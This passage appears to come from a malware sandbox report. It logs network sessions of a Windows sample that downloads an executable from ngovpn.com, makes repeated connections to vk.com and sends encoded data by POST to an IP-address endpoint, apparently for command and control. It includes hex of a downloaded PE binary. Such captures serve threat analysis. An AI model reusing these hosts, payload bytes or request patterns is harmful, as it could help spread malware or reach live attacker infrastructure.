Mar 28, 2024 09:14:59.963253021 CET	1286	IN	Data Raw: 83 24 e2 3b e5 3c d1 fd 72 66 26 d7 cb cb eb 5c 92 36 c8 5a 2f 50 7e 4d 25 a8 f3 ea 68 5b f9 56 f0 80 20 5e 3e 9b 61 ae 72 12 b7 fa 2e a9 1f 86 a1 3a 33 e4 b6 60 27 63 2c d6 70 d2 0c 5e 62 60 92 e1 61 5c 04 de ca 75 91 56 e1 db 83 94 1e 72 6e af Data Ascii: $;<rf&\6Z/P~M%h[V ^>ar.:3`'c,p^b`a\uVrnEiF^&r9_O>J\]l+mg u0{cYJ^WUcbka%V=&+_b!^~#Lm4bR;(zCD*n2,FP\
Mar 28, 2024 09:14:59.963289976 CET	1286	IN	Data Raw: a4 96 4c c8 ff 80 ae 6b a5 4d bc fb 52 be ea 2f 85 de c7 1a 06 20 b2 62 a5 63 92 df b7 b9 6c 60 07 a2 ce b6 ad 34 6a 79 58 4c da 62 76 ea e4 3e c3 7e c4 f9 f0 52 09 da d0 71 60 00 12 e6 8e ca 14 e6 f3 ee 32 38 5d 48 76 ad 6a 82 f4 86 44 6c c9 85 Data Ascii: LkMR/ bcl`4jyXLbv>~Rq`28]HvjDl^a@b=$pQnE3^?[z1S*j7n,CFkpIp+2VHqWq&#G:`-64n{os6!d=JJE(ss fG
Mar 28, 2024 09:14:59.963314056 CET	1286	IN	Data Raw: 61 60 b2 58 8a 98 f1 1e 06 84 64 a7 d6 43 e2 6d a6 d9 00 d6 05 95 b1 a2 62 61 a7 bb 5f 55 2b 4c e2 5c 3a 7c 55 54 30 e4 b6 84 42 9c 69 80 4f 7c 9b 1d 70 21 42 1d 61 5c 0b 40 2d 70 94 9d d5 58 c9 ba 32 4a 0a 66 0f 18 79 23 4a ae 47 60 88 e0 ee 10 Data Ascii: a`XdCmba_U+L\:\|UT0BiO\|p!Ba\@-pX2Jfy#JG`AOQ\9&6q^xi'6vj'Fa:Z`NZ65b[!Jpf\SV&v.nPp_/d?\|V22cdZ[^_;0}*"p,f~_Oh0[F1hi
Mar 28, 2024 09:15:00.181472063 CET	1286	IN	Data Raw: e5 4a f2 7c 7c 16 da 6b 7c 4a 4e b0 e3 5f 74 ac ee 50 41 64 0a 63 06 93 14 59 72 02 41 4e 52 8a 00 66 6d f2 c1 fe f2 c8 38 22 c5 2f da 14 58 70 24 94 e9 7d 96 e7 85 9b ef 04 a3 91 e6 be 1a 0b 92 6d 26 f2 cf 87 2e 68 ba ec 5f 76 3e a2 3d a4 3a cd Data Ascii: J\|\|k\|JN_tPAdcYrANRfm8"/Xp$}m&.h_v>=:0>>H/uDYzt"I\~8`dxR(/Ch$nvn+jVQnM}R1RrtekiJH"k2B+ng)FMD8u8gqD#\<"y/

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.4	49765	130.164.189.20	80	6984	C:\Users\user\Desktop\i1crvbOZAP.exe

Timestamp	Bytes transferred	Direction	Data
Mar 28, 2024 09:14:59.712721109 CET	201	OUT	GET /share/index.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Host: ngovpn.com Cache-Control: no-cache
Mar 28, 2024 09:15:00.234446049 CET	1236	IN	HTTP/1.1 200 OK Server: nginx/1.24.0 Date: Thu, 28 Mar 2024 08:15:00 GMT Content-Type: application/octet-stream Connection: close Content-Description: File Transfer Content-Disposition: attachment; filename=0e4bf4bb.exe Content-Transfer-Encoding: binary Expires: 0 Cache-Control: must-revalidate Pragma: public Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 6a 7e c8 64 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 0c 00 00 e6 00 00 00 0e 6e 00 00 00 00 00 06 3c 00 00 00 10 00 00 00 00 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 10 6f 00 00 04 00 00 d2 03 05 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 f4 60 01 00 50 00 00 00 00 20 6e 00 00 e6 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 01 01 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 55 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 98 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 50 e5 00 00 00 10 00 00 00 e6 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 4c 6a 00 00 00 00 01 00 00 6c 00 00 00 ea 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 0c a7 6c 00 00 70 01 00 00 40 02 00 00 56 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 00 e6 00 00 00 20 6e 00 00 e6 00 00 00 96 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELj~dn<@o`P n8U@.textP `.rdataLjl@@.datalp@V@.rsrc n@@
Mar 28, 2024 09:15:00.234819889 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: hE@#Yh:@#Yh/@#YUE8u3]PkY]UEVAtVz#Y^]UUA;Bu;u3@3
Mar 28, 2024 09:15:00.491967916 CET	1236	IN	Data Raw: 98 bf 41 00 81 c1 4b 13 01 00 51 56 a3 28 06 ae 00 89 0d 24 05 ae 00 ff 15 28 00 41 00 8d 4d dc a3 7c 04 ae 00 51 6a 40 ff 35 24 05 ae 00 50 ff 15 84 00 41 00 bf 6e 15 29 00 56 8d 85 80 ea ff ff 50 ff 15 90 01 41 00 4f 75 ef 8b 0d 24 05 ae 00 8b Data Ascii: AKQV($(AM\|Qj@5$PAn)VPAOu$tx(8K\|8$uQP<AEPVEPV`AVhAVPEPEPEPVPh4UA,A$G;r9=ujhDUAdAVEPVP
Mar 28, 2024 09:15:00.492059946 CET	1236	IN	Data Raw: 41 00 4e 75 de 5f 33 c0 5e 8b e5 5d c2 10 00 55 8b ec 56 ff 75 08 8b f1 83 66 10 00 c7 46 14 0f 00 00 00 c6 06 00 e8 cd f6 ff ff 59 50 ff 75 08 8b ce e8 df 00 00 00 8b c6 5e 5d c2 04 00 55 8b ec 8b 45 0c 53 8b 5d 08 56 57 8b f1 8b 7b 10 3b f8 72 Data Ascii: ANu_3^]UVufFYPu^]UES]VW{;rt+9}B};uP'EPjIGjWt;{r~rtEWPQP~~r8_^[]hUAU}VW}t ~rStWSV
Mar 28, 2024 09:15:00.492068052 CET	1236	IN	Data Raw: 41 00 e9 f0 24 00 00 e9 eb 24 00 00 e9 e6 24 00 00 55 8b ec 56 8b f1 c7 06 f4 0f 41 00 e8 d5 24 00 00 f6 45 08 01 74 07 56 e8 a0 15 00 00 59 8b c6 5e 5d c2 04 00 55 8b ec 56 8b f1 e8 b6 24 00 00 f6 45 08 01 74 07 56 e8 81 15 00 00 59 8b c6 5e 5d Data Ascii: A$$$UVA$EtVY^]UV$EtVY^]UV$EtVbY^]UVx$EtVCY^]UjEEAPM$hZAEEAPUEMEEP#hh[AEEAPU
Mar 28, 2024 09:15:00.492124081 CET	1236	IN	Data Raw: f7 d9 ff 24 8d b4 23 40 00 8d 49 00 8b c7 ba 03 00 00 00 83 f9 04 72 0c 83 e0 03 2b c8 ff 24 85 08 23 40 00 ff 24 8d 04 24 40 00 90 18 23 40 00 3c 23 40 00 64 23 40 00 8a 46 03 23 d1 88 47 03 83 ee 01 c1 e9 02 83 ef 01 83 f9 08 72 b2 fd f3 a5 fc Data Ascii: $#@Ir+$#@$$@#@<#@d#@F#Gr$$@IF#GFGr$$@F#GFGFGV$$@I#@#@#@#@#@#@#@#@DDDDDDD
Mar 28, 2024 09:15:03.089709997 CET	1236	IN	Data Raw: 83 e0 03 03 c8 ff 24 85 cc 27 40 00 ff 24 8d c8 28 40 00 90 ff 24 8d 4c 28 40 00 90 dc 27 40 00 08 28 40 00 2c 28 40 00 23 d1 8a 06 88 07 8a 46 01 88 47 01 8a 46 02 c1 e9 02 88 47 02 83 c6 03 83 c7 03 83 f9 08 72 cc f3 a5 ff 24 95 b8 28 40 00 8d Data Ascii: $'@$(@$L(@'@(@,(@#FGFGr$(@I#FGr$(@#r$(@I(@(@(@(@(@\|(@t(@l(@DDDDDDDDDDDDDD
Mar 28, 2024 09:15:03.335563898 CET	1236	IN	Data Raw: 1c 24 e8 df 18 00 00 8b 4d 10 83 c4 0c 8b 55 fc 85 c9 79 0d b8 00 00 00 80 2b c1 3b d0 7c 5a eb 0f b8 ff ff ff 7f 2b c1 3b d0 0f 8f b8 00 00 00 8d 04 0a 3d 00 0a 00 00 0f 8f aa 00 00 00 3d 00 04 00 00 7e 2d 05 00 fa ff ff 50 51 51 dd 1c 24 e8 63 Data Ascii: $MUy+;\|Z+;==~-PQQ$cV\$E]E\$=}%V\$E]E\$E$jj\|=}&PQQ$V\$E]EPQQ$WV]!V\$
Mar 28, 2024 09:15:03.335705042 CET	1236	IN	Data Raw: 56 e8 4e 2c 00 00 59 89 7d fc 56 e8 1c ff ff ff 59 8b f8 89 7d e4 c7 45 fc fe ff ff ff e8 0e 00 00 00 8b c7 e8 10 39 00 00 c3 8b 75 08 8b 7d e4 56 e8 8d 2c 00 00 59 c3 6a 14 68 00 5c 41 00 e8 b0 38 00 00 33 ff 89 7d e4 21 7d dc 6a 01 e8 14 37 00 Data Ascii: VN,Y}VY}E9u}V,Yjh\A83}!}j7Y!}3]u;5t]@tWPV,YYE@t0uPYtG}u@tPjYuEeF]}u4V,YYE
Mar 28, 2024 09:15:03.580344915 CET	1236	IN	Data Raw: 85 ff 74 33 8b d1 03 d0 4f 3b ca 73 2a 8a 01 3c 0d 75 13 8d 42 ff 3b c8 73 18 8d 41 01 80 38 0a 75 10 8b c8 eb 0c 0f b6 c0 0f be 80 d0 7d 41 00 03 c8 41 85 ff 75 d1 8d 85 fc ef ff ff 2b f0 8d 04 31 e9 72 01 00 00 8b bd f0 ef ff ff 8b 04 bd 38 b1 Data Ascii: t3O;s*<uB;sA8u}AAu+1r8CDt:uGB;ru .ua:9Xu+ppj8C[DjS
Mar 28, 2024 09:15:03.581428051 CET	1236	IN	Data Raw: 8f 38 00 00 83 c8 ff eb 3c 8b 7d 10 85 ff 74 0a 83 ff 01 74 05 83 ff 02 75 da 56 e8 8c 22 00 00 59 83 65 fc 00 57 ff 75 0c 56 e8 18 ff ff ff 83 c4 0c 8b f8 89 7d e4 c7 45 fc fe ff ff ff e8 0e 00 00 00 8b c7 e8 47 2f 00 00 c3 8b 75 08 8b 7d e4 56 Data Ascii: 8<}ttuV"YeWuV}EG/u}V"YQ<AcBYUAPEPAYY@]UVEtV:Y^]UE3+]UuCYtukBYt]jEEAPMhZAE

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.4	49770	93.186.225.194	80	6984	C:\Users\user\Desktop\i1crvbOZAP.exe

Timestamp	Bytes transferred	Direction	Data
Mar 28, 2024 09:14:59.805568933 CET	110	OUT	Data Raw: 16 03 01 00 69 01 00 00 65 03 01 66 05 27 03 6c cc ec 39 c4 2b 29 da 65 e0 ab fc 88 99 13 cc 6c 13 39 20 01 17 3e 75 9b 8d 3b 59 00 00 0e c0 0a c0 09 c0 14 c0 13 00 35 00 2f 00 0a 01 00 00 2e 00 00 00 0b 00 09 00 00 06 76 6b 2e 63 6f 6d 00 0a 00 Data Ascii: ief'l9+)el9 >u;Y5/.vk.com#
Mar 28, 2024 09:15:00.015571117 CET	341	IN	HTTP/1.1 400 Bad Request Server: kittenx Date: Thu, 28 Mar 2024 08:14:59 GMT Content-Type: text/html Content-Length: 152 Connection: close Strict-Transport-Security: max-age=86400 Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6b 69 74 74 65 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>kittenx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.4	49771	93.186.225.194	80	6984	C:\Users\user\Desktop\i1crvbOZAP.exe

Timestamp	Bytes transferred	Direction	Data
Mar 28, 2024 09:14:59.811172009 CET	110	OUT	Data Raw: 16 03 01 00 69 01 00 00 65 03 01 66 05 27 03 c3 3d 5f b9 de 14 0d ec 16 10 47 f7 82 52 27 a7 df 80 cb a9 76 1a fc 3f cd 9a 20 d8 00 00 0e c0 0a c0 09 c0 14 c0 13 00 35 00 2f 00 0a 01 00 00 2e 00 00 00 0b 00 09 00 00 06 76 6b 2e 63 6f 6d 00 0a 00 Data Ascii: ief'=_GR'v? 5/.vk.com#
Mar 28, 2024 09:15:00.027358055 CET	341	IN	HTTP/1.1 400 Bad Request Server: kittenx Date: Thu, 28 Mar 2024 08:14:59 GMT Content-Type: text/html Content-Length: 152 Connection: close Strict-Transport-Security: max-age=86400 Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6b 69 74 74 65 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>kittenx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.2.4	49774	93.186.225.194	80	6984	C:\Users\user\Desktop\i1crvbOZAP.exe

Timestamp	Bytes transferred	Direction	Data
Mar 28, 2024 09:15:00.277399063 CET	110	OUT	Data Raw: 16 03 01 00 69 01 00 00 65 03 01 66 05 27 03 67 66 a0 43 e9 c8 10 21 2d 89 43 cd 87 3e 3a 14 52 9e 88 8a c5 7a c9 9e 8e 07 fa d4 00 00 0e c0 0a c0 09 c0 14 c0 13 00 35 00 2f 00 0a 01 00 00 2e 00 00 00 0b 00 09 00 00 06 76 6b 2e 63 6f 6d 00 0a 00 Data Ascii: ief'gfC!-C>:Rz5/.vk.com#
Mar 28, 2024 09:15:00.496021986 CET	341	IN	HTTP/1.1 400 Bad Request Server: kittenx Date: Thu, 28 Mar 2024 08:15:00 GMT Content-Type: text/html Content-Length: 152 Connection: close Strict-Transport-Security: max-age=86400 Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6b 69 74 74 65 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>kittenx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
29	192.168.2.4	49775	93.186.225.194	80	6984	C:\Users\user\Desktop\i1crvbOZAP.exe

Timestamp	Bytes transferred	Direction	Data
Mar 28, 2024 09:15:00.277494907 CET	110	OUT	Data Raw: 16 03 01 00 69 01 00 00 65 03 01 66 05 27 03 c1 da 1b 09 36 76 bd f1 fc 30 41 30 73 e0 89 33 e1 b1 01 9c 99 6b 03 99 1b 31 e9 1e 00 00 0e c0 0a c0 09 c0 14 c0 13 00 35 00 2f 00 0a 01 00 00 2e 00 00 00 0b 00 09 00 00 06 76 6b 2e 63 6f 6d 00 0a 00 Data Ascii: ief'6v0A0s3k15/.vk.com#
Mar 28, 2024 09:15:00.496088028 CET	341	IN	HTTP/1.1 400 Bad Request Server: kittenx Date: Thu, 28 Mar 2024 08:15:00 GMT Content-Type: text/html Content-Length: 152 Connection: close Strict-Transport-Security: max-age=86400 Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6b 69 74 74 65 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>kittenx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
30	192.168.2.4	49777	93.186.225.194	80	6984	C:\Users\user\Desktop\i1crvbOZAP.exe

Timestamp	Bytes transferred	Direction	Data
Mar 28, 2024 09:15:00.799999952 CET	110	OUT	Data Raw: 16 03 01 00 69 01 00 00 65 03 01 66 05 27 04 5a 5b 2a b7 cf ad af cf 10 1e cc 4c cc f9 3e c8 aa 3c 61 1d 48 e8 b8 19 ba d5 37 0a 00 00 0e c0 0a c0 09 c0 14 c0 13 00 35 00 2f 00 0a 01 00 00 2e 00 00 00 0b 00 09 00 00 06 76 6b 2e 63 6f 6d 00 0a 00 Data Ascii: ief'Z[*L><aH75/.vk.com#
Mar 28, 2024 09:15:01.011725903 CET	341	IN	HTTP/1.1 400 Bad Request Server: kittenx Date: Thu, 28 Mar 2024 08:15:00 GMT Content-Type: text/html Content-Length: 152 Connection: close Strict-Transport-Security: max-age=86400 Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6b 69 74 74 65 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>kittenx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
31	192.168.2.4	49776	93.186.225.194	80	6984	C:\Users\user\Desktop\i1crvbOZAP.exe

Timestamp	Bytes transferred	Direction	Data
Mar 28, 2024 09:15:01.807533979 CET	110	OUT	Data Raw: 16 03 01 00 69 01 00 00 65 03 01 66 05 27 05 81 40 d3 2a cc d3 6d 3c 0a 19 d5 53 96 b0 ba 36 b8 33 c8 65 48 b1 72 06 84 f4 43 97 00 00 0e c0 0a c0 09 c0 14 c0 13 00 35 00 2f 00 0a 01 00 00 2e 00 00 00 0b 00 09 00 00 06 76 6b 2e 63 6f 6d 00 0a 00 Data Ascii: ief'@*m<S63eHrC5/.vk.com#
Mar 28, 2024 09:15:02.023034096 CET	341	IN	HTTP/1.1 400 Bad Request Server: kittenx Date: Thu, 28 Mar 2024 08:15:01 GMT Content-Type: text/html Content-Length: 152 Connection: close Strict-Transport-Security: max-age=86400 Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6b 69 74 74 65 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>kittenx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
32	192.168.2.4	49802	46.226.167.187	80	6984	C:\Users\user\Desktop\i1crvbOZAP.exe

Timestamp	Bytes transferred	Direction	Data
Mar 28, 2024 09:15:16.113612890 CET	273	OUT	POST /api/flash.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Content-Length: 261 Host: 46.226.167.187
Mar 28, 2024 09:15:16.113631010 CET	261	OUT	Data Raw: 64 61 74 61 3d 63 7a 55 42 76 4c 69 36 74 35 41 65 4f 51 70 6d 36 70 55 73 4f 53 39 6f 45 50 56 54 4c 6a 2d 5a 6c 2d 73 56 6a 4c 52 33 4c 61 5a 6c 72 55 53 32 51 36 35 34 30 4f 6f 62 72 78 71 76 5f 79 38 6c 30 64 70 57 2d 72 4b 50 42 4b 77 45 5f Data Ascii: data=czUBvLi6t5AeOQpm6pUsOS9oEPVTLj-Zl-sVjLR3LaZlrUS2Q6540Oobrxqv_y8l0dpW-rKPBKwE_o-ff5hs4bLR0OtegquAFzybP4eCK8DD92Y1DwhNqW4sL8KvVGV6OSxdX4uE6P0h9R8NF1OMMH0NsOa9k8NTIQk1JnDPCDSDWe1wtYpT_m9drvXO4x9WLSbxXJwY3HH-JaXK3ldy0VAsst_Y2mSOXDEOQpek6bXRS6
Mar 28, 2024 09:15:16.464081049 CET	363	IN	HTTP/1.1 200 OK Date: Thu, 28 Mar 2024 08:15:16 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30 X-Powered-By: PHP/8.0.30 Content-Length: 108 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 4e 51 39 78 35 67 66 42 6f 55 34 77 6d 73 68 4f 2f 54 4a 51 37 49 6d 4b 7a 56 50 6e 34 4d 50 43 73 51 6c 5a 72 47 36 66 33 65 7a 65 58 36 4f 53 46 5a 62 51 4b 55 4e 45 2f 47 4e 6b 34 2f 78 65 63 75 54 58 41 50 4a 6a 73 7a 75 31 51 72 68 56 58 62 32 59 74 49 56 79 67 57 4c 43 43 63 67 5a 4e 32 67 2f 38 30 2f 37 65 34 6f 3d Data Ascii: NQ9x5gfBoU4wmshO/TJQ7ImKzVPn4MPCsQlZrG6f3ezeX6OSFZbQKUNE/GNk4/xecuTXAPJjszu1QrhVXb2YtIVygWLCCcgZN2g/80/7e4o=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
33	192.168.2.4	49803	46.226.167.187	80	6984	C:\Users\user\Desktop\i1crvbOZAP.exe

Timestamp	Bytes transferred	Direction	Data
Mar 28, 2024 09:15:16.491301060 CET	273	OUT	POST /api/flash.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Content-Length: 669 Host: 46.226.167.187
Mar 28, 2024 09:15:16.491301060 CET	669	OUT	Data Raw: 64 61 74 61 3d 57 31 38 30 32 34 5a 31 70 52 36 31 65 75 52 36 4c 58 41 33 66 5a 4a 77 54 4b 76 7a 72 45 73 51 4b 53 6a 49 34 51 76 65 76 4f 79 30 55 57 57 53 74 4e 54 4b 4a 75 70 4b 4d 45 67 5f 41 72 79 4f 4d 34 76 32 69 69 49 54 6b 67 73 30 78 Data Ascii: data=W18024Z1pR61euR6LXA3fZJwTKvzrEsQKSjI4QvevOy0UWWStNTKJupKMEg_AryOM4v2iiITkgs0xV5uz_Uxvoix6t_S_kjLx8PZ6bSpjVWSRp9740m6emRi9dZoffCIUUKGNFJFaEsK326aXEaNCSi2d18-wZ9H4Q84W3qF0ZzhzllU3fammESoc1KGHHhKFKTwfg426zjJoNSApxkCWRJdB2zKnQjoZGP3iC1LAMmxeO
Mar 28, 2024 09:15:17.112149000 CET	363	IN	HTTP/1.1 200 OK Date: Thu, 28 Mar 2024 08:15:16 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30 X-Powered-By: PHP/8.0.30 Content-Length: 108 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 4a 79 5a 52 6e 64 33 6c 72 5a 39 48 72 38 73 63 56 30 30 6f 48 4e 35 69 38 4c 45 31 48 58 63 37 2b 4b 6e 6a 55 38 70 7a 5a 4e 49 72 58 66 6a 42 67 34 34 33 59 73 2b 4f 6e 56 70 46 57 45 39 59 36 76 58 30 37 35 50 4d 77 39 34 54 34 2b 51 5a 76 31 2b 4b 56 33 58 49 42 6d 67 72 4f 62 72 50 68 73 6e 68 77 69 33 2b 49 47 30 3d Data Ascii: JyZRnd3lrZ9Hr8scV00oHN5i8LE1HXc7+KnjU8pzZNIrXfjBg443Ys+OnVpFWE9Y6vX075PMw94T4+QZv1+KV3XIBmgrObrPhsnhwi3+IG0=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
34	192.168.2.4	49807	185.172.128.26	80	7664	C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe

